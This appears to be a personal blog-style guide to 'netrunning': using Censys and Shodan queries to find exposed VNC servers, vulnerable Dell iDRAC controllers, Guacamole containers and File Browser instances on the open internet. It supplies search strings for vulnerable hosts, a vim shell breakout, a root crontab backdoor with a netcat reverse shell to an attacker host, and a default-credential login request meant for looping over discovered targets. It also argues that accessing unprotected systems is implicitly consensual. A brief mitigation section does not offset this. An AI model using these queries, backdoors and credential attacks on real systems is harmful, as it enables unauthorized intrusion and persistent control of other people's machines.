NETRUNNER GUIDE

What is a Netrunner?

 In their 1991 nonfiction whodunit, Cyberpunk: Outlaws and Hackers on the Computer Frontier, Katie Hafner and John Markoff used the word "cyberpunk" to describe "young people for whom computers and computer networks are an obsession, and who have carried their obsession beyond what computer professionals consider ethical and lawmakers consider acceptable."

Netrunners are the elite hackers in the tabletop RPG cyberpunk. Per the wiki, they roam the Internet, looking for systems to hack and information to sell. They tend to hold libertarian values in terms of the Internet and don't avoid skirting the law to access interesting places and information. This is an apt description for the method of security research that will be described here. 

Tools such as Shodan, Censys, ZoomEye, Masscan, and Nmap have been used to scan ports and track internet connected hosts forever. They provide a means of indexing and searching the REAL Internet (Most people think of The Internet as the web) and a number of interesting hosts and services can be found with relative ease, others take a bit more effort. 

Leveraging these tools to find internet connected hosts with open access or potential vulnerabilities with no specific target in mind is what will be termed as "netrunning". I guess leaning more towards the Gibsonian "Console Cowboy", but not always the case. 

The main approach is to find some system revealing some method of access and identify the patterns so that it can be reduced to a filter. For example, one could find a vulnerable version of a device and search by some unique identifier such as the favicon hash of the login page. Another approach would be to use banners or a portion of the data available from scanning. VNC hosts can be identified with the protocol banner and if there is no authentication it will display the hostname or the logged-in user's prompt. 

With a major influx of cloud systems in recent years more and more hosts are now connected to the internet with no firewall! Companies spent the past 10 or 20 years focusing on securing the perimeter and investing in firewall technology and external pentests and for a majority those systems have been placed right back on the internet.

 

Philosophy

1. Port scanning is not a crime
2. Accessing an open system is not a crime
3. Exploitation is a moral grey area 
4. The current laws regarding the internet & cybercrime isn't great

I am not a lawyer, this is not legal advice, some actions within this text may be illegal in some jurisdictions and I am not endorsing or otherwise encouraging any of the actions in this piece. This for educational purposes only, any media on this page was done within a lab environment and is a simulation of events. This also hampers the credibility of my legal opinion but my point is that I think these laws need to be reassessed and thought about critically by those with the proper knowledge and experience.

Point number 1 is true and the points slowly descend into more radical ideas. 

Accessing an open system is a grey area. In many cases it has been detrimental to parties that have taken some action on a system against the operator's will. Weev and Aaron Swartz are exemplary of this sort of thing. In the US there's a law that if you have a swimming pool (server) on your property (network) that is not protected by a fence (firewall/acl/etc) and someone drowns the owner of the property (operator) is liable. 

I think the law should be the same for openly accessible systems. Access is implicitly consensual. You don't need express permission to access a website, unless they require a login which you typically agree to some terms to gain access. A web server hosting an “Index Of” directory is the same thing. It doesn't matter if it's a directory with ssh private keys or an MP3 archive. By putting a server on the internet without authentication you are saying “You can access this system without explicit authorization as the configuration implies”. 

I may elaborate on other points in future version of this text. 

This is mainly concerning the morality/legality of the subject and not necessarily focused on economic or political philosophy. 

 

Part I - Background/Introduction

Netrunning was my foray into the world of ‘hacking’ in a networked security context. I started in elementary school and would spend hours after school and in the summer at the public library computer lab. It all began with google dorks and the ability to find open webcams on the internet. It became more than a hobby for me, I could travel all around the world from my desktop and be a fly on the wall. Cameras equipped with PTZ functionality took it to a different level and I was able to find dorks for specific PTZ cameras. 

This is an important aspect as mentioned earlier. The same sort of concept can be applied to IDOR research and yet it is rather subtle. It is important to find a unique pattern in some small subset of available hosts that can reliably identify other similar hosts. 

I scoured the internet using other tools like PunkSpider (old tool that indexed hosts with web vulnerabilities) and found my fair share of hosts vulnerable to SQL injection.

Over the years I've encountered a staggering number of internet connected machines. From server management controllers to automated systems used in agriculture. SCADA and ICS systems are probably some of the most well-known in the port scanning scene due to their uniqueness and perceived ability to cause damage. (This would sort of make a good iceberg chart) 

There have been several major vulnerabilities in recent years Heartbleed, BlueKeep, Shellshock to name a few. Though these can be mass exploited with ease for fun and profit, it doesn't make for a great target group due to their popularity and ease of exploitation. The best approach typically requires some step that is difficult or impossible to automate. 

There are governments (somewhat speculative) as well as groups of professional criminals (APT) that have people dedicated to this sort of work and it's nearly impossible to compete with known exploits/access methods. 

I feel like this is something that isn't really given a spotlight especially among all of the other “cooler” trends currently in the field. Malware, reverse engineering, API security. Maybe it will become more popular since this is the approach Maia took to find open Jenkins build servers and leak the TSA No-Flight list (WARNING: I don't think she can leave whatever country she's in so be careful lol)  

 

Part II - VNC 

VNC and RDP are two exemplary services when it comes to this sort of thing and it's what got me back into this sort of thing and eventually lead to me writing this. Computernewb (most popular for collab VM) has a tool called VNC Resolver a tool that displays random insecure VNC servers. It is similar to sites like srsly.de, WorldofVNC, Shodan, and others. The scans are only done periodically and the last scan was completed May 2022. 

I set out to create my own scanning interface, which is still incomplete and turned out to be a monstrous task. It also doesn't help that it's incredibly difficult to find a VPS provider that allows port scanning. My preferred provider briefly allowed portscanning during the period in which i wrote the tool.                                        

This led me down a rabbithole of filtering and searching within censys. I ended up with a very simple search with a number of different variations. The desktop name accepts a wildcard using “**” which will display all vnc servers displaying a desktop name which equates to not requiring auth. 

5900.vnc.banner.desktop_name: {vnc_banner_desktop_name} OR 5901.vnc.banner.desktop_name: {vnc_banner_desktop_name}

Censys has since made changes to the API and I believe this query will need to be reconstructed. I leave this as an exercise to the reader (I've always wanted to say that). I find Shodan to be a better tool overall and the query would probably include some portion of the VNC banner 

RFB X.XX

I wrote another tool tool go through Censys data and screenshot the VNC hosts. Many of these servers were an environment that I will describe in more detail later. An application such as filezilla or jDownloader served over VNC. Though the environment may be somewhat isolated and stripped down In most instances it is possible to break out with simple kiosk breakout techniques. For example using the File > Open menu within filezilla and opening a file in vim allows one to get to a shell prompt with

 :!/bin/sh

Potential findings may include:

• Tons of accessible embedded systems (Agricultural, Home Automation, SCADA, ICS)
• Lots of QEMU guests
• Windows Server with last pass with credentials for a major ISP's NOC and other systems
• VNC docker container on a developer's corporate laptop used for watching his ethereum mine from work. 
• Radio station switchboard (which also could be hypothetically broken out of and potentially pivoted to an outdated Windows DC)

 

Part III - BMC 

Service/Protocol: Dell iDRAC

Probably the highest impact of all mentioned. There was an RCE vulnerability discovered for the iDRAC platform several years ago and the exploit is publicly available and easily executable. 

Dell iDRAC7 and iDRAC8 Devices Code Injection Vulnerability (RCE)
Vulnerable version firmware: <  2.52.52.52
CVE number: CVE-2018-1207

 

The query for this page is rather simple. After identifying a vulnerable host one can use the sha1 hash of the login page to find other vulnerable hosts. The following query on Censys returns 2,380 hosts with a vulnerable BMC attached to the internet. I learned this little trick from an article about searching for Sonicwalls using the favicon hash.

services.http.response.body_hash="sha1:f67deb5fcb06bd39b7447b858e092cd6fbfe1bf4"

(There are multiple page hashes that can be used to identify vulnerable hosts)

 

One could easily backdoor the BMC after exploitation by passing something like the following post-exploitation.

racadm getsysinfo
cd /flash/data0/crontabs
echo "*/15 * * * * /bin/nc {LPORT} {LHOST} -e /bin/sh" > root
sleep 3
nc {LPORT} {LHOST} -e /bin/sh

 

The worst part is these devices were never intended to be connected to the internet. You'd most likely find them on the IT/Management network of an organization but none-the-less. The Dell iDRAC features a full VirtualKVM environment and as close to physical access as one can get without being onsite. 

 

 

Part IV - Free Guac

Query: http.title:"Guacamole Client" port:"3000"

There is some software that hosts a docker container with a firefox browser with the idea of having a remotely accessible browser within your browser. Well this is a security nightmare. As the app is a docker container that ships a full fledged OpenBox environment. You're able to close firefox and use xterm. The program has a default user abc with password abc which is permitted to use sudo by default…

Some provided a full desktop environment…

 

Pivoting from this service is possible if there is a route to the host machine's LAN. Hint the credentials for their router is often Admin:Admin

Part V - File Browser

File Browser is a nice program I like it but… yeah. This is a no-fuss web file server written in Go. You can share any directory over the network with a simple command. The default password for the web interface is the infamous “Admin:Admin”. 

http.title:"File Browser"

The program features an API which it uses for authentication making it simple to automate and doesn't require fancy tools like burp. The request looks like this:

curl 'https://{RHOST}:{RPORT}/api/login' -X POST -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate, br' -H 'Referer: https://{RHOST}:{RPORT}/login' -H 'Content-Type: application/json' -H 'Origin: https://{RHOST}:{RPORT}' -H 'Connection: keep-alive' -H 'Sec-Fetch-Dest: empty' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Site: same-origin' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw '{"username":"admin","password":"admin","recaptcha":""}'

It would then be trivial to write a simple python script looping over the discovered hosts and sending this request. The script could then be updated for bruteforcing as well as using the command api to either act as a remote shell itself or to send a connection back to the client machine. 

AUDIO WARNING!!! - VERY LOUD I SORRY

AUDIO WARNING!!! - VERY LOUD I SORRY

 

Part VI - Mitigation 

A lot of these services are hosted in the cloud. One approach would be to setup your server with software intended to host multiple applications although this software isn't fully there yet. Cloudron and Umbrel will allow you to host multiple apps on a server and enforce authentication. 

You can have a firewall in the cloud! I host or have hosted a lot of the services previously mentioned and they're all behind a firewall. I have a PFSense instance which is hosted in the cloud. All DNS entries for several different domains point to the IP of the PFSense box. Other VPS servers and my home network all connect back to this box via VPN. This is essentially like having a private LAN (hence “Virtual Private Network”) in the cloud. I in turn use tailscale to access the network from external devices such as my phone and laptop. 

Any hosted application is proxied through HAProxy which hosts a single shared https frontend. Now I can access services hosted at home or in the cloud with full control over the traffic. This makes it simple to blacklist nefarious IP addresses or network scanners such as Shodan. I don't have any IDS/IPS configured but that's an option too. 

Obviously, if you're on a local network enable your ISP router's firewall or build/buy/recycle a fancy one.

 

Part VII - Synopsis

In the early days the problem itself was security. Devices were connected to the internet and happy to provide services like FTP, Telnet, VNC, and so on without requiring authentication. We shortly found this isn't a very good idea and started protecting these services with firewalls. The focus then shifted to hardware and the perimeter and ensuring there was some physical device sitting between the servers and the internet. We've now come full circle with cloud services that provide very little in terms of security on the customer's behalf. The same problems are reappearing. 

Developers should also be taking a more critical approach to the security of their applications as there are many assumptions but no certainty on where or how an operator will run their code. Default passwords should almost NEVER be set to something easily guessable or available in public documentation, random first-run password generation or forced default password changes are an effective and simple solution. 

These issues will only become increasingly prevalent as we see ever more devices connected to the internet, the adoption of IPv6, and more and more code. 

Part VIII - Minutia

• Some form of Netrunner Bounty Program
• I wanted this to be distinct from "Attack Open Server" sk1d culture and hopefully this was more sophisticated. Everyone knows about the lower port numbers and it's boring, lame, and well defended. This is more about the methodology and embracing the obscurity and diversity of internet connected devices.
• "bUt ItS OnLy A DoCkEr CoNtAinEr!" lol
• EDUCATIONAL PURPOSES ONLY 
• 0days are obviously instant win
• Please don't bust down my door or anything, just give me a call or send an email or something.
• Building a community to leverage OSINT in order to defend as many systems as possible
• Reassessing Computer Access Laws 
• THE AUTHOR HAS NO MALICIOUS INTENT 
• Use ML/AI on internet index data (just cause)
• Creating some form of database not only with queries but measured results (Quantity, Vulnerability, Severity) [something along the lines of an “Open Security Assessment”]
• THE AUTHOR DOES NOT ENDORSE OR CONDONE ANY ILLEGAL ACTIVITIES 
• VPS and Cloud providers should consider providing a simple firewall by default for customers!